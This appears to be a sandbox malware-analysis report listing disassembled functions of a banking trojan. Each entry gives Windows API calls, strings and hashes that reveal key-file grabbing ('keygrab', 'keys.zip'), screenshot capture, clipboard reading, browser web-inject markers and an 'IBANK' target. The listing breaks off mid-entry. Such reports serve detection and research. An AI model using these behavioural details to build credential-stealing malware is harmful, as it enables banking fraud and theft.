                                                                                                                                                                                                              • API ID: FileHeap$AllocFreePathProcess$AttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$#680CurrentDeleteFindFirstFolderMakeModuleNameSystemValidate_snprintflstrcpynmemset
                                                                                                                                                                                                              • String ID: 61C5C387$\$inter.zip$path.txt
                                                                                                                                                                                                              • API String ID: 2230608801-2171418579
                                                                                                                                                                                                              • Opcode ID: c212ef6807419b16e255636122cf9b2144de9bdb34885863537effe46623c7ec
                                                                                                                                                                                                              • Instruction ID: d34589cf1bbe101d1df6a6acd91d088aca1c0416b12c4f5beec901a6f37592a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c212ef6807419b16e255636122cf9b2144de9bdb34885863537effe46623c7ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A61067050030A9FDB36DF2898A8BEB7BE8BF45309F144198E989D7285DB70D648CB90
                                                                                                                                                                                                              Function 013028F0 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 189memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435,?,?,00000000), ref: 01302920
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 01302961
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 0130296B
                                                                                                                                                                                                              • #680.SHELL32(?,?,00000000), ref: 01302973
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01302984
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0130298B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 013029BF
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,?,?,00000000), ref: 013029CC
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 01302A10
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,?,00000000), ref: 01302A2C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 01302A49
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorFileLastPath$#680AllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemVirtuallstrcpyn
                                                                                                                                                                                                              • String ID: 61C5C435$\$path.txt$rfk.zip
                                                                                                                                                                                                              • API String ID: 1623271082-3154236201
                                                                                                                                                                                                              • Opcode ID: 693707f71144a34108511ba96f566d2d9d6cd9b139d6c41467cfeaa326638f04
                                                                                                                                                                                                              • Instruction ID: 43907c77e02a86abb859fd7c26833bf962ed198776fa13a6fdba6633d1382a5f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 693707f71144a34108511ba96f566d2d9d6cd9b139d6c41467cfeaa326638f04
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F861D63050065A5FEB339F2898ACBFB7BE8AF45305F144198E5C9D7281DF709A88CB90
                                                                                                                                                                                                              Function 012F2410 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 012F2370: memset.MSVCRT(?,00000000,00000206), ref: 012F2392
                                                                                                                                                                                                                • Part of subcall function 012F2370: GetParent.USER32(?), ref: 012F239E
                                                                                                                                                                                                                • Part of subcall function 012F2370: GetWindowTextW.USER32(00000000,?,00000104), ref: 012F23B5
                                                                                                                                                                                                                • Part of subcall function 012F2370: StrStrIW.SHLWAPI(?,00000000), ref: 012F23D6
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB38), ref: 012F2446
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012F2474
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,?), ref: 012F2488
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012F2499
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012F249F
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F24A8
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012F24B9
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000201), ref: 012F24C3
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,keygrab), ref: 012F24D5
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012F24E0
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012F24E6
                                                                                                                                                                                                              • #680.SHELL32 ref: 012F24EE
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012F24FF
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012F2506
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012F2513
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%02u.bmp,?), ref: 012F2543
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB38), ref: 012F2563
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$ErrorLast$#680AppendBackslashCreateCriticalDirectoryFolderMakeSectionSystem$EnterLeaveParentTextWindow_snprintfmemset
                                                                                                                                                                                                              • String ID: %02u.bmp$keygrab
                                                                                                                                                                                                              • API String ID: 3034168964-4222822809
                                                                                                                                                                                                              • Opcode ID: baf8bf34766166f2b50887f0cfb8a39038788c9fab12dc60167940ab21692fff
                                                                                                                                                                                                              • Instruction ID: 7b3ce1207cee060134097d9e8a9657f05a817ac9a7d3489ee07b41effba2a918
                                                                                                                                                                                                              • Opcode Fuzzy Hash: baf8bf34766166f2b50887f0cfb8a39038788c9fab12dc60167940ab21692fff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26316D7550021ADBDB30EFA89C58AE9BBBCEF59311F0444ACE685D7144DBB4DA84CBA0
                                                                                                                                                                                                              Function 012F1320 Relevance: 31.8, APIs: 16, Strings: 5, Instructions: 275memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(0132FB20,00000000,00000000,00000000,?,012F1A39), ref: 012F1330
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020,?,012F1A39), ref: 012F1398
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,012F1A39), ref: 012F139F
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,013295CC,013295BC,set_url ,?,012F1A39), ref: 012F141F
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,013295D0), ref: 012F1439
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,013295D4), ref: 012F1453
                                                                                                                                                                                                              • strstr.MSVCRT(00000000,013295D8), ref: 012F146D
                                                                                                                                                                                                              • strstr.MSVCRT(00000001,data_before), ref: 012F1497
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000020), ref: 012F14B4
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F14BB
                                                                                                                                                                                                              • strstr.MSVCRT(-00000003,data_before,data_after,data_inject,data_before), ref: 012F15E4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F161C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F161F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F162C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F162F
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB20,?,012F1A39), ref: 012F163A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                              • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                              • API String ID: 2387113551-2328515424
                                                                                                                                                                                                              • Opcode ID: ff7eef326bd84883a58df761090fc896f67c6cb0f244efc70787321f2b5354b5
                                                                                                                                                                                                              • Instruction ID: ac356ff1e2431e8655eb2b4b524ba77a0fcc9212baec1daee3610a568d51d043
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff7eef326bd84883a58df761090fc896f67c6cb0f244efc70787321f2b5354b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8A1C135A00352DFDB32DF3894587A6BFE5EF45314F18816CDA868B206EB72D619CB90
                                                                                                                                                                                                              Function 012FB1D0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 189memoryfilestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103), ref: 012FB1F0
                                                                                                                                                                                                                • Part of subcall function 012FB110: PathAddBackslashA.SHLWAPI(61C5C0AD), ref: 012FB137
                                                                                                                                                                                                                • Part of subcall function 012FB110: GetFileAttributesA.KERNEL32(?), ref: 012FB175
                                                                                                                                                                                                                • Part of subcall function 012FB110: PathFileExistsA.SHLWAPI(?), ref: 012FB1B9
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0AD), ref: 012FB238
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 012FB2A0
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012FB2AD
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0AD,?,?), ref: 012FB2E7
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 012FB36A
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 012FB37E
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 012FB391
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 012FB3C0
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0AD), ref: 012FB3CB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FB3EE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012FB3F1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FB3FE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012FB401
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashFileHeap$AttributesFreeProcessVirtual$AllocCurrentDeleteDirectoryExistsValidatelstrcpynmemset
                                                                                                                                                                                                              • String ID: 5NT$61C5C0AD$keys.zip$path.txt
                                                                                                                                                                                                              • API String ID: 2685098104-2040460267
                                                                                                                                                                                                              • Opcode ID: dfb1c4dea309e33f34af88c22ed011ce2fdfdc2c489f5099b2f158a488ba8382
                                                                                                                                                                                                              • Instruction ID: c70c81ae1119881701e7c538fc632aef1933ec7b67316d6ba444472ef3da0af3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfb1c4dea309e33f34af88c22ed011ce2fdfdc2c489f5099b2f158a488ba8382
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD51467054434A5BDB329F28D8A8FEABBE8EB46704F1441ACEB89D7242DA709548C790
                                                                                                                                                                                                              Function 013038F0 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 189memorystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133D098), ref: 01303920
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01303961
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0130396B
                                                                                                                                                                                                              • #680.SHELL32 ref: 01303973
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 01303984
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0130398B
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 013039BF
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?), ref: 013039CC
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 01303A10
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 01303A2C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 01303A49
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorFileLastPath$#680AllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemVirtuallstrcpyn
                                                                                                                                                                                                              • String ID: \$path.txt$stf.zip
                                                                                                                                                                                                              • API String ID: 1623271082-487659054
                                                                                                                                                                                                              • Opcode ID: 44bc286902d069eeab0fea4d985ca4ef55d8027d63b55699d2ff3e9c27f9c5a6
                                                                                                                                                                                                              • Instruction ID: e286d9300c680b0c17702ce3f537cec2b9b323c4ae63b3d30cc1ff1248f8d2d1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44bc286902d069eeab0fea4d985ca4ef55d8027d63b55699d2ff3e9c27f9c5a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3161D63050065A5FDB32DF289868BEB7BE8BF45708F544198E58AD7291DB709688CB90
                                                                                                                                                                                                              Function 01308890 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 187COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileType.KERNEL32(?,00000000,00000000), ref: 01308899
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(?,?), ref: 013088B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleInformationType
                                                                                                                                                                                                              • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                              • API String ID: 4064226416-1748840775
                                                                                                                                                                                                              • Opcode ID: 9c250a12b1d5da4df994594c2c36eb4a31380dcb69c7bd6499824ec9a86ef244
                                                                                                                                                                                                              • Instruction ID: 9ec6b1a05fcb26f5f9c4cd1c503480ca01bbd0ad8c265b4affc03fc2c585af0d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c250a12b1d5da4df994594c2c36eb4a31380dcb69c7bd6499824ec9a86ef244
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9518171D00218ABEB25DFA8DC95BFEBBB8EB44705F104169FA04EB1C0D774A940CB91
                                                                                                                                                                                                              Function 012F3220 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 173memorythreadclipboardCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 012F323D
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 012F325E
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 012F327F
                                                                                                                                                                                                              • GetGUIThreadInfo.USER32(00000000), ref: 012F3286
                                                                                                                                                                                                              • GetOpenClipboardWindow.USER32 ref: 012F329C
                                                                                                                                                                                                              • GetActiveWindow.USER32 ref: 012F32AA
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 012F32D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000013), ref: 012F32FA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F3301
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000013), ref: 012F3311
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 012F332E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F337B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F337E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F338B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F338E
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 012F3399
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 012F33DF
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 3472172748-4108050209
                                                                                                                                                                                                              • Opcode ID: a9be642ccfe4d7f0335851bd5f03d459f855c98679fa69bce802b5b744c8e829
                                                                                                                                                                                                              • Instruction ID: b19686b450fd00138e7e0e65d64d5597aaf5fb21dfbaa71033d45a9b3ddb759c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a9be642ccfe4d7f0335851bd5f03d459f855c98679fa69bce802b5b744c8e829
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6451E231214312ABE731EF289C58FABBB9DFB86754F14422CFB4597284DB60DA04C7A5
                                                                                                                                                                                                              Function 012EC510 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 112sleepwindowthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 012EC51C
                                                                                                                                                                                                              • GetWindow.USER32(?,00000005,00000001), ref: 012EC53D
                                                                                                                                                                                                              • GetWindow.USER32(00000000), ref: 012EC540
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 012EC545
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 012EC554
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 012EC567
                                                                                                                                                                                                              • GetClassNameA.USER32(00000000,?,00000101), ref: 012EC589
                                                                                                                                                                                                              • GetWindowInfo.USER32(00000000,?), ref: 012EC5F5
                                                                                                                                                                                                              • SetWindowLongA.USER32(00000000,000000EC,?), ref: 012EC617
                                                                                                                                                                                                              • SetLayeredWindowAttributes.USER32(00000000,0000FFFF,000000FF,00000002), ref: 012EC626
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 012EC62F
                                                                                                                                                                                                              • SetClassLongA.USER32(00000000,000000E6,00000000), ref: 012EC642
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 012EC64A
                                                                                                                                                                                                              • EnumChildWindows.USER32(00000000,Function_0000C4B0,00000000), ref: 012EC658
                                                                                                                                                                                                              • GetWindow.USER32(00000000,00000003), ref: 012EC661
                                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 012EC66F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ClassLong$SleepVisible$AttributesChildDesktopEnumInfoLayeredNameProcessThreadWindows
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 4154023459-4251816714
                                                                                                                                                                                                              • Opcode ID: 05a7612c00bc470430ed10b792ce5907a5f35c9e22fc057bc79a62398512bd9a
                                                                                                                                                                                                              • Instruction ID: cec12d5c0b14b847a488e713ab9e6409f82729ce73baaaf27b37ec522e052a93
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05a7612c00bc470430ed10b792ce5907a5f35c9e22fc057bc79a62398512bd9a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4031B330660216AFE731AEA8EC4EFBE77ACEF45761F500118F715E20C4D7B49A118BA4
                                                                                                                                                                                                              Function 012FF2D0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 109sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C1E7), ref: 012FF2F7
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FF33B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF347
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF34B
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FF35C
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF363
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012FF390
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FF39F
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FF3A5
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FF3A9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FF3BA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FF3C1
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 012FF3EF
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 012FF405
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLastPath$#680BackslashCreateDirectoryFolderMakeSystem$Sleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$61C5C1E7$scrs
                                                                                                                                                                                                              • API String ID: 161959730-3422111203
                                                                                                                                                                                                              • Opcode ID: f1a68d76d7e34ae909afae9d385a168468d622584b0507a4743f50873216c89b
                                                                                                                                                                                                              • Instruction ID: f7565667d675701e40e43102e677b0b4e327bd30cd31da241b687635451e2184
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1a68d76d7e34ae909afae9d385a168468d622584b0507a4743f50873216c89b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4631F8325042595BCB30AF789C58BEABBECFB55700F4440ACEB85D3244DAB0DA84CBA0
                                                                                                                                                                                                              Function 01300560 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 83sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 0130057C
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 01300592
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}), ref: 013005A0
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013005A9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 013005C7
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 013005D5
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00020420,00000000,00000000,00000000), ref: 013005EA
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 013005FB
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01300600
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 01300614
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01300622
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C165), ref: 0130062D
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C165,IBANK), ref: 01300647
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
